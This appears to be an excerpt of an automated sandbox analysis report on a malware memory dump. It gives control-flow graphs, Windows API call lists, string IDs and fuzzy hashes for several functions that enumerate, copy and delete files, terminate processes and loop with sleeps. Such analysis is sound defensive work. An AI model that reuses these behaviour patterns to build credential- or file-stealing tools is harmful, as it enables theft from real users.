                                                                                                                                                                                                            control_flow_graph 1797 414200-4142e5 call 40fcf0 * 3 call 40fd90 * 3 call 40fd00 * 6 1822 4142e8-4142ef call 402670 1797->1822 1825 4142f5-414411 call 4023a0 call 40fde0 call 40fd80 call 402400 call 40fd40 * 5 call 413910 call 40fde0 1822->1825 1826 414416-414510 call 4023a0 call 4023d0 call 40fd40 * 3 call 413a50 call 40fde0 call 40fd80 call 40ffa0 StrCmpCA 1822->1826 1878 414587-41458a call 40fd80 1825->1878 1864 414512-414569 call 402400 call 40fd40 * 2 call 401060 call 413910 1826->1864 1865 41458f-4145a5 call 40ffa0 StrCmpCA 1826->1865 1905 41456e-414581 call 40fde0 1864->1905 1872 415176-41527c call 40fde0 call 402400 call 40fde0 call 40fd80 call 402690 call 40fde0 call 40fd80 call 40fd40 * 3 call 40fd80 * 10 1865->1872 1873 4145ab-4145b2 call 402680 1865->1873 2247 415280-4152a6 call 40fd80 * 2 1872->2247 1885 414762-414778 call 40ffa0 StrCmpCA 1873->1885 1886 4145b8-4145bf call 402670 1873->1886 1878->1865 1900 415067-415171 call 40fde0 call 402490 call 40fde0 call 40fd80 call 4026c0 call 40fde0 call 40fd80 call 40fd40 * 3 call 40fd80 * 10 1885->1900 1901 41477e-414785 call 402670 1885->1901 1897 4145c5-414661 call 402430 call 40fde0 call 40fd80 call 402490 call 40fd40 call 402430 call 401060 call 413910 call 40fde0 1886->1897 1898 414666-4146e3 call 402430 call 402460 call 401060 call 413a50 call 40fde0 call 40fd80 call 40ffa0 StrCmpCA 1886->1898 2078 41475a-41475d call 40fd80 1897->2078 1898->1885 2025 4146e5-414754 call 402490 call 40fd40 * 2 call 401060 call 413910 call 40fde0 1898->2025 1900->2247 1919 41494b-414964 call 40ffa0 StrCmpCA 1901->1919 1920 41478b-414792 call 402670 1901->1920 1905->1878 1936 414f55-415062 call 40fde0 call 402520 call 40fde0 call 40fd80 call 4026f0 call 40fde0 call 40fd80 call 40fd40 * 3 call 40fd80 * 10 1919->1936 1937 41496a-414971 call 402670 1919->1937 1934 414798-41483a call 4024c0 call 40fde0 call 40fd80 call 402520 call 40fd40 call 4024c0 call 401060 call 413910 call 40fde0 1920->1934 1935 41483f-4148c2 call 4024c0 call 4024f0 call 401060 call 413a50 call 40fde0 call 40fd80 call 40ffa0 StrCmpCA 1920->1935 2149 414943-414946 call 40fd80 1934->2149 1935->1919 2093 4148c8-41493d call 402520 call 40fd40 * 2 call 401060 call 413910 call 40fde0 1935->2093 1936->2247 1961 414b21-414b37 call 40ffa0 StrCmpCA 1937->1961 1962 414977-41497e call 402670 1937->1962 1993 414e40-414f50 call 40fde0 call 4025b0 call 40fde0 call 40fd80 call 402720 call 40fde0 call 40fd80 call 40fd40 * 3 call 40fd80 * 10 1961->1993 1994 414b3d-414b44 call 402670 1961->1994 1991 414a25-414aa2 call 402550 call 402580 call 401060 call 413a50 call 40fde0 call 40fd80 call 40ffa0 StrCmpCA 1962->1991 1992 414984-414a20 call 402550 call 40fde0 call 40fd80 call 4025b0 call 40fd40 call 402550 call 401060 call 413910 call 40fde0 1962->1992 1991->1961 2174 414aa4-414b13 call 4025b0 call 40fd40 * 2 call 401060 call 413910 call 40fde0 1991->2174 2211 414b19-414b1c call 40fd80 1992->2211 1993->2247 2018 414d00-414d16 call 40ffa0 StrCmpCA 1994->2018 2019 414b4a-414b51 call 402670 1994->2019 2061 414d28-414e3b call 40fde0 call 402640 call 40fde0 call 40fd80 call 402750 call 40fde0 call 40fd80 call 40fd40 * 3 call 40fd80 * 10 2018->2061 2062 414d18-414d23 Sleep 2018->2062 2056 414b57-414bf9 call 4025e0 call 40fde0 call 40fd80 call 402640 call 40fd40 call 4025e0 call 401060 call 413910 call 40fde0 2019->2056 2057 414bfe-414c81 call 4025e0 call 402610 call 401060 call 413a50 call 40fde0 call 40fd80 call 40ffa0 StrCmpCA 2019->2057 2025->2078 2260 414cf8-414cfb call 40fd80 2056->2260 2057->2018 2232 414c83-414cf5 call 402640 call 40fd40 * 2 call 401060 call 413910 call 40fde0 2057->2232 2061->2247 2062->1822 2078->1885 2093->2149 2149->1919 2174->2211 2211->1961 2232->2260 2260->2018
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrlenA.KERNEL32(00418439,?,00000000,?,00417B7D,004271CF,004271CE,00000000,?,00000000,00422B88,000000FF,?,00418439), ref: 0040FD9B
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrcpy.KERNEL32(00000000,00418439), ref: 0040FDD2
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414508
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00413910: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413985
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041459D
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004146DB
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414770
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004148BA
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041495C
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414A9A
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414B2F
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414C79
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414D0E
                                                                                                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 00414D1D
                                                                                                                                                                                                              • Part of subcall function 00413A50: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413AE4
                                                                                                                                                                                                              • Part of subcall function 00413A50: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00421EC9), ref: 00413AFB
                                                                                                                                                                                                              • Part of subcall function 00413A50: StrStrA.SHLWAPI(00000000,00000000), ref: 00413B27
                                                                                                                                                                                                              • Part of subcall function 00413A50: lstrlenA.KERNEL32(00000000), ref: 00413B3C
                                                                                                                                                                                                              • Part of subcall function 00413A50: lstrlenA.KERNEL32(00000000), ref: 00413B59
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                            • String ID: -$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$m|A$m|A
                                                                                                                                                                                                            • API String ID: 507064821-1632856118
                                                                                                                                                                                                            • Opcode ID: 328b2485757397c3b37487ad35b0d0c1ea257533a16b35bcafb8b439e5869999
                                                                                                                                                                                                            • Instruction ID: aed7d6f3aa0019d3c343f5ee98e3fbac06cb3f5f74b7f48def07c2e400331f4f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 328b2485757397c3b37487ad35b0d0c1ea257533a16b35bcafb8b439e5869999
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7B27470C01248EACB15EBA5C5566DDBBB86F19308F5480BEE846736C2DB78670CCB76
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00416418 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 215stringfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 2646 416418-41641f 2647 416420-416434 StrCmpCA 2646->2647 2648 416737-41674a FindNextFileA 2647->2648 2649 41643a-41644e StrCmpCA 2647->2649 2648->2647 2651 416750-416769 FindClose call 40fd80 2648->2651 2649->2648 2650 416454-416485 wsprintfA StrCmpCA 2649->2650 2652 4164b0-4164cd wsprintfA 2650->2652 2653 416487-4164ae wsprintfA 2650->2653 2659 41676d-416794 call 40fd80 * 2 2651->2659 2655 4164d0-416510 memset lstrcat strtok_s 2652->2655 2653->2655 2657 416512-416523 2655->2657 2658 41653f-41657c memset lstrcat strtok_s 2655->2658 2661 4166d1-4166d9 2657->2661 2668 416529-41653d strtok_s 2657->2668 2658->2661 2662 416582-416592 PathMatchSpecA 2658->2662 2661->2648 2665 4166db-4166e9 2661->2665 2666 416624-416638 strtok_s 2662->2666 2667 416598-416622 call 411330 wsprintfA call 40fd80 call 4117b0 call 419540 2662->2667 2665->2651 2671 4166eb-4166f3 2665->2671 2666->2662 2670 41663e 2666->2670 2667->2666 2688 416643-41664e 2667->2688 2668->2657 2668->2658 2670->2661 2671->2648 2674 4166f5-416731 call 401060 call 416370 2671->2674 2674->2648 2689 416795-4167a8 call 40fd80 2688->2689 2690 416654-41667a call 40fd00 call 406d60 2688->2690 2689->2659 2697 4166c4-4166ca 2690->2697 2698 41667c-4166bf call 40fd00 call 401060 call 4152b0 call 40fd80 2690->2698 2697->2661 2698->2697
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00427460,?,?,?,?,?,?,?,00416992,?), ref: 0041642C
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00427464,?,?,?,?,?,?,?,00416992,?), ref: 00416446
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0041646B
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0042718B,?,?,?,?,?,?,?,?,?,?,?,00416992,?), ref: 0041647D
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004164A5
                                                                                                                                                                                                              • Part of subcall function 004117B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 004117DF
                                                                                                                                                                                                              • Part of subcall function 004117B0: CloseHandle.KERNEL32(00000000), ref: 004117EA
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004164C7
                                                                                                                                                                                                            • memset.MSVCRT ref: 004164DD
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 004164F0
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00416506
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00416533
                                                                                                                                                                                                            • memset.MSVCRT ref: 0041654C
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 0041655C
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00416572
                                                                                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041658A
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004165CD
                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041661B
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0041662E
                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,00416992,?), ref: 00416742
                                                                                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00416992,?), ref: 00416754
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strtok_swsprintf$CloseFileFindlstrcatmemset$HandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\%s\%s
                                                                                                                                                                                                            • API String ID: 3008008253-2927280355
                                                                                                                                                                                                            • Opcode ID: 770bd37d802abc1ce7d36aa51219093e3415d7ed30894907b93af01321ffe99f
                                                                                                                                                                                                            • Instruction ID: 5b993a6a48ce23b3dbaaa0d920a96343135d48cb87c0c5231f895be9d5bfc925
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 770bd37d802abc1ce7d36aa51219093e3415d7ed30894907b93af01321ffe99f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 687196B1900218ABDB24DFA4DD85EEE777DAF58704F10859AF50993241EB38DE88CB64
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00407320 Relevance: 32.1, APIs: 21, Instructions: 569stringmemoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FF70: StrCmpCA.SHLWAPI(?,00000000,?,00407356,00CBF110,?,00000000,?), ref: 0040FF7A
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrlenA.KERNEL32(00418439,?,00000000,?,00417B7D,004271CF,004271CE,00000000,?,00000000,00422B88,000000FF,?,00418439), ref: 0040FD9B
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrcpy.KERNEL32(00000000,00418439), ref: 0040FDD2
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 00411330: GetSystemTime.KERNEL32(?,00CBE790,004270B8,?,00000000,00000008,?,?,00000000,00421951,000000FF,?,0040452E,0041FC79,00000014), ref: 00411385
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 004073FF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004076B6
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407805
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268E0), ref: 00407814
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407827
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268E4), ref: 00407836
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407849
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268E8), ref: 00407858
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040786B
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268EC), ref: 0040787A
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040788D
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268F0), ref: 0040789C
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 004078AF
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268F4), ref: 004078BE
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407905
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268F8), ref: 00407923
                                                                                                                                                                                                            • lstrlenA.KERNEL32(000000FF), ref: 0040798A
                                                                                                                                                                                                            • lstrlenA.KERNEL32(000000FF), ref: 00407999
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 004076BD
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00411900: memset.MSVCRT ref: 00411935
                                                                                                                                                                                                              • Part of subcall function 00411900: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407426,0040D964), ref: 00411966
                                                                                                                                                                                                              • Part of subcall function 00411900: HeapAlloc.KERNEL32(00000000,?,00407426,0040D964), ref: 0041196D
                                                                                                                                                                                                              • Part of subcall function 00411900: wsprintfW.USER32 ref: 0041197C
                                                                                                                                                                                                              • Part of subcall function 00411900: OpenProcess.KERNEL32(00001001,00000000), ref: 004119DD
                                                                                                                                                                                                              • Part of subcall function 00411900: TerminateProcess.KERNEL32(00000000,00000000), ref: 004119EC
                                                                                                                                                                                                              • Part of subcall function 00411900: CloseHandle.KERNEL32(00000000), ref: 004119F3
                                                                                                                                                                                                            • memset.MSVCRT ref: 004079F0
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,?,?,?,004268AA), ref: 00407A18
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2944411387-0
                                                                                                                                                                                                            • Opcode ID: c411359d233154ae56d0272af0cc94956353f2bf6e0e46428310aa639c0b9f49
                                                                                                                                                                                                            • Instruction ID: befac64a77c11b028f21c794dc64f479b0ddbd1dfc135b628543eec644da6144
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c411359d233154ae56d0272af0cc94956353f2bf6e0e46428310aa639c0b9f49
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B325071900248EACB14EBE4DC59AEE7B78AF19308F54417EF502732D1DB786A0DCB65
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00409610 Relevance: 31.9, APIs: 21, Instructions: 433stringmemoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 00411330: GetSystemTime.KERNEL32(?,00CBE790,004270B8,?,00000000,00000008,?,?,00000000,00421951,000000FF,?,0040452E,0041FC79,00000014), ref: 00411385
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,004268E7,00000009), ref: 004096D6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409842
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00409849
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040998F
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AC0), ref: 0040999E
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 004099B1
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AC4), ref: 004099C0
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 004099D3
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AC8), ref: 004099E2
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 004099F5
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426ACC), ref: 00409A04
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A17
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AD0), ref: 00409A26
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A39
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AD4), ref: 00409A48
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A5B
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AD8), ref: 00409A6A
                                                                                                                                                                                                            • lstrlenA.KERNEL32(000000FF), ref: 00409AE0
                                                                                                                                                                                                            • lstrlenA.KERNEL32(000000FF), ref: 00409AEF
                                                                                                                                                                                                            • memset.MSVCRT ref: 00409B45
                                                                                                                                                                                                              • Part of subcall function 0040FF70: StrCmpCA.SHLWAPI(?,00000000,?,00407356,00CBF110,?,00000000,?), ref: 0040FF7A
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00409B6D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1973479514-0
                                                                                                                                                                                                            • Opcode ID: f9094cda30f9b0aa3f96d91d50c9cc89aca361b112142c99aa16552c90d5d119
                                                                                                                                                                                                            • Instruction ID: b3ac11316cea7633826742b8e7274d3baecd15e1301da64cc56eaeeb22614ff7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9094cda30f9b0aa3f96d91d50c9cc89aca361b112142c99aa16552c90d5d119
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F026D70800158EADB14EBE4DC59BEEBB79AF19304F50817EF502B3291DA786A0DCB75
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00412220 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 323stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00412266
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004122F3
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00412330
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00412379
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004123C2
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 0041240A
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412595
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00412622
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$strtok_s
                                                                                                                                                                                                            • String ID: false$true
                                                                                                                                                                                                            • API String ID: 2610293679-2658103896
                                                                                                                                                                                                            • Opcode ID: fa12b8d585db11d4d61522ce74fbf5b729377d92af5562b28b7be1e754fef68e
